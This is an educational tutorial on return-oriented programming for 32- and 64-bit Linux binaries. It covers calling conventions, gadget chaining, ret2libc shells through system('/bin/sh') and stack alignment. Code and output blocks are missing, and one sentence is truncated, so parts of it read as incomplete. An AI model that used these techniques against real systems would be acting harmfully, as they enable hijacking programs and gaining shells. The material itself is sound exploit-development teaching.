Utilising Calling Conventions
The program expects the stack to be laid out like this before executing the function:
So why don't we provide it like that? As well as the function, we also pass the return address and the parameters.
Everything after the address of flag()
will be part of the stack frame for the next function as it is expected to be there - just instead of using push
instructions we just overwrote them manually.
Same logic, except we have to utilise the gadgets we talked about previously to fill the required registers (in this case rdi
and rsi
as we have two parameters).
We have to fill the registers before the function is called
Bypassing NX
The basis of ROP is chaining together small chunks of code already present within the binary itself in such a way to do what you wish. This often involves passing parameters to functions already present within libc
, such as system
- if you can find the location of a command, such as cat flag.txt
, and then pass it as a parameter to system
, it will execute that command and return the output. A more dangerous command is /bin/sh
, which when run by system
gives the attacker a shell much like the shellcode we used did.
Doing this, however, is not as simple as it may seem at first. To be able to properly call functions, we first have to understand how to pass parameters to them.
The standard ROP exploit
A ret2libc is based off the system
function found within the C library. This function executes anything passed to it making it the best target. Another thing found within libc is the string /bin/sh
; if you pass this string to system
, it will pop a shell.
And that is the entire basis of it - passing /bin/sh
as a parameter to system
. Doesn't sound too bad, right?
To start with, we are going to disable ASLR. ASLR randomises the location of libc in memory, meaning we cannot (without other steps) work out the location of system
and /bin/sh
. To understand the general theory, we will start with it disabled.
Fortunately Linux has a command called ldd
for dynamic linking. If we run it on our compiled ELF file, it'll tell us the libraries it uses and their base addresses.
We need libc.so.6
, so the base address of libc is 0xf7dc2000
.
Libc base and the system and /bin/sh offsets may be different for you. This isn't a problem - it just means you have a different libc version. Make sure you use your values.
To call system, we obviously need its location in memory. We can use the readelf
command for this.
The -s
flag tells readelf
to search for symbols, for example functions. Here we can find the offset of system from libc base is 0x44f00
.
Since /bin/sh
is just a string, we can use strings
on the dynamic library we just found with ldd
. Note that when passing strings as parameters you need to pass a pointer to the string, not the hex representation of the string, because that's how C expects it.
-a
tells it to scan the entire file; -t x
tells it to output the offset in hex.
Repeat the process with the libc
linked to the 64-bit exploit (should be called something like /lib/x86_64-linux-gnu/libc.so.6
).
Note that instead of passing the parameter in after the return pointer, you will have to use a pop rdi; ret
gadget to put it into the RDI register.
Unsurprisingly, pwntools has a bunch of features that make this much simpler.
The 64-bit looks essentially the same.
Pwntools can simplify it even more with its ROP capabilities, but I won't showcase them here.
A more in-depth look into parameters for 32-bit and 64-bit programs
Let's have a quick look at the source:
Pretty simple.
If we run the 32-bit and 64-bit versions, we get the same output:
Just what we expected.
Let's open the binary up in radare2 and disassemble it.
If we look closely at the calls to sym.vuln
, we see a pattern:
We literally push
the parameter to the stack before calling the function. Let's break on sym.vuln
.
The first value there is the return pointer that we talked about before - the second, however, is the parameter. This makes sense because the return pointer gets pushed during the call
, so it should be at the top of the stack. Now let's disassemble sym.vuln
.
Here I'm showing the full output of the command because a lot of it is relevant. radare2
does a great job of detecting local variables - as you can see at the top, there is one called arg_8h
. Later this same one is compared to 0xdeadbeef
:
Clearly that's our parameter.
So now we know, when there's one parameter, it gets pushed to the stack so that the stack looks like:
Let's disassemble main
again here.
Hohoho, it's different. As we mentioned before, the parameter gets moved to rdi
(in the disassembly here it's edi
, but edi
is just the lower 32 bits of rdi
, and the parameter is only 32 bits long, so it says EDI
instead). If we break on sym.vuln
again we can check rdi
with the command
Just dr
will display all registers
Awesome.
Registers are used for parameters, but the return address is still pushed onto the stack and in ROP is placed right after the function address
We've seen the full disassembly of an almost identical binary, so I'll only isolate the important parts.
It's just as simple - push
them in reverse order of how they're passed in. The reverse order becomes helpful when you db sym.vuln
and print out the stack.
So it becomes quite clear how more parameters are placed on the stack:
So as well as rdi
, we also push to rdx
and rsi
(or, in this case, their lower 32 bits).
Just to show that it is in fact ultimately rdi
and not edi
that is used, I will alter the original one-parameter code to utilise a bigger number:
If you disassemble main
, you can see it disassembles to
movabs
can be used to encode the mov
instruction for 64-bit instructions - treat it as if it's a mov
.
Controlling execution with snippets of code
Gadgets are small snippets of code followed by a ret
instruction, e.g. pop rdi; ret
. We can manipulate the ret
of these gadgets in such a way as to string together a large chain of them to do what we want.
Let's for a minute pretend the stack looks like this during the execution of a pop rdi; ret
gadget.
What happens is fairly obvious - 0x10
gets popped into rdi
as it is at the top of the stack during the pop rdi
. Once the pop
occurs, rsp
moves:
And since ret
is equivalent to pop rip
, 0x5655576724
gets moved into rip
. Note how the stack is laid out for this.
When we overwrite the return pointer, we overwrite the value pointed at by rsp
. Once that value is popped, it points at the next value at the stack - but wait. We can overwrite the next value in the stack.
Let's say that we want to exploit a binary to jump to a pop rdi; ret
gadget, pop 0x100
into rdi
then jump to flag()
. Let's step-by-step the execution.
On the original ret
, which we overwrite the return pointer for, we pop the gadget address in. Now rip
moves to point to the gadget, and rsp
moves to the next memory address.
rsp
moves to the 0x100
; rip
to the pop rdi
. Now when we pop, 0x100
gets moved into rdi
.
RSP moves onto the next items on the stack, the address of flag()
. The ret
is executed and flag()
is called.
Essentially, if the gadget pops values from the stack, simply place those values afterwards (including the pop rip
in ret
). If we want to pop 0x10
into rdi
and then jump to 0x16
, our payload would look like this:
Note if you have multiple pop
instructions, you can just add more values.
We use rdi
as an example because, if you remember, that's the register for the first parameter in 64-bit. This means control of this register using this gadget is important.
We can use the tool ROPgadget
to find possible gadgets.
Combine it with grep
to look for specific registers.
A minor issue
A small issue you may get when pwning on 64-bit systems is that your exploit works perfectly locally but fails remotely - or even fails when you try to use the provided LIBC version rather than your local one. This arises due to something called stack alignment.
Essentially the . LIBC takes advantage of this and uses to optimise execution; system
in particular utilises instructions such as movaps
.
That means that if the stack is not 16-byte aligned - that is, RSP is not a multiple of 16 - the ROP chain will fail on system
.
The fix is simple - in your ROP chain, before the call to system
, place a singular ret
gadget:
This works because it will cause RSP to be popped an additional time, pushing it forward by 8 bytes and aligning it.